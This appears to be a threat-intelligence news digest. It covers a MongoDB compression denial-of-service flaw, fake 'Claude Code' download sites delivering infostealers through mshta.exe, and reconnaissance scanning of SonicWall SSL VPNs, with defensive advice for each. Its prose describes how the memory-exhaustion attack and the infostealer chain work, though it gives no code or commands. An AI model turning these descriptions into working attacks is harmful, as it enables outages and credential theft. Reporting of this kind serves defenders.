Trending Topics

High-Severity MongoDB Compression Bug Enables Fast Pre-Auth DoS

Cato CTRL’s Vitaly Simonovich disclosed CVE-2026-25611, a high-severity (7.5) vulnerability affecting all MongoDB deployments with wire-protocol compression enabled, including MongoDB Atlas. By abusing the OP_COMPRESSED message flow, a threat actor can send small, crafted packets, causing MongoDB to allocate 48MB per connection before validation and rapidly exhausting RAM; as few as 3–10 connections can crash small instances, while even 64GB servers can be taken down with roughly a thousand concurrent connections. Although Atlas clusters are not internet-reachable by default and must be opened via IP allow lists, more than 207,000 MongoDB instances are exposed on the internet today, and those reachable from 0.0.0.0/0 are particularly at risk of unauthenticated denial-of-service attacks. Organizations should immediately upgrade to fixed releases (8.2.4 / 8.0.18 / 7.0.29 or later), restrict MongoDB exposure to trusted networks, enforce sensible connection limits and monitoring for abnormal memory growth or OP_COMPRESSED patterns, and consider disabling compression where it is not operationally necessary.

Fake “Claude Code” Download Sites Use mshta.exe to Deliver Lightweight Infostealers

Threat actors are exploiting interest in Anthropic’s Claude Code tools by standing up fake download portals that masquerade as official desktop installers and quietly deliver a script‑based infostealer via mshta.exe. Attackers register or compromise domains that visually mimic legitimate Claude or “Claude Code” landing pages, then drive traffic through search poisoning, paid ads, and social media posts aimed at developers and power users looking for native clients. When a victim clicks the “Download” button, they receive a small script or shortcut file that hands execution to built‑in Windows binaries instead of a legitimate installer, allowing the chain to blend in with normal user activity. At the core of this campaign is mshta.exe, Microsoft’s long‑abused HTML Application Host, which can execute local or remote HTA content with the same trust as a native Windows component. After launch, the fake installer spawns mshta.exe with a remote URL parameter, instructing it to fetch and run an HTA payload that decodes and executes additional scripts or shell commands to harvest browser data, credentials, and system information, then exfiltrate it to attacker‑controlled infrastructure. This operation underscores why “simple” LOLBins still matter: a single suspicious mshta.exe invocation, especially one spawned from an unusual parent (e.g., a newly downloaded shortcut) and reaching out to a newly observed domain, may be the only visible indicator of a multi‑stage infostealer chain. Defenders should prioritize high‑fidelity detections for remote HTA execution, anomalous parents of mshta.exe, and outbound connections to newly registered or untrusted domains associated with AI tools.

Update: Surge in SonicWall SSL VPN Reconnaissance

Between February 22–25, 2026, GreyNoise logged 84,142 scanning sessions against SonicWall SonicOS devices from 4,305 IPs across 20 autonomous systems, with 92% of traffic hitting a single SSL VPN status API and 32% routed through a rotating commercial proxy service, indicating coordinated, proxy-backed attack surface mapping rather than active CVE exploitation. This pattern, which mirrors prior multi-vendor VPN campaigns, is designed to quietly build an inventory of internet-exposed SonicWall SSL VPN instances before investing in credential attacks or vulnerability exploits. Because SonicWall SSL VPN remains a heavily abused initial access vector for ransomware groups such as Akira and Fog, this reconnaissance should be treated as an early-warning phase: once attackers pair these mapped targets with stolen or sprayed credentials and flaws like CVE-2024-53704, they have repeatedly demonstrated the ability to move from VPN login to full network encryption in under four hours. Organizations running SonicWall should prioritize patching against known KEV-listed vulnerabilities, enforcing MFA on all VPN accounts, and restricting management and API endpoints to trusted networks to reduce the likelihood that this mapping activity results in a successful compromise.